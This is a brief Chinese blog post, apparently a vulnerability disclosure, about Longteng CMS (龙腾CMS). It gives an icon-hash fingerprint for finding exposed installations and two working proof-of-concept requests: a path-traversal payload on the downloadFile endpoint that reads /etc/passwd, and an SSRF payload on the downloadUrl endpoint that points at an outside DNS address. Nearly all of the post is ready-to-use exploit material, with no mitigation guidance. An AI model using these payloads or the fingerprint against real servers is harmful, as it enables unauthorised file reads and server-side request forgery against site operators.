网络测绘 icon_hash="-803002403"
downloadfile
漏洞poc
地址/api/file/downloadFile?file=../../../../../../../../../../../../../../../../../etc/passwd
或者不使用抓包,访问该地址会直接下载一个文件
downloadurl
漏洞poc
地址/api/file/downloadUrl?file=http://dns地址
龙腾CMS存在downloadUrl SSRF漏洞,downloadFile任意文件读取漏洞
Posted on 2024-08-15 36 Views
Comments NOTHING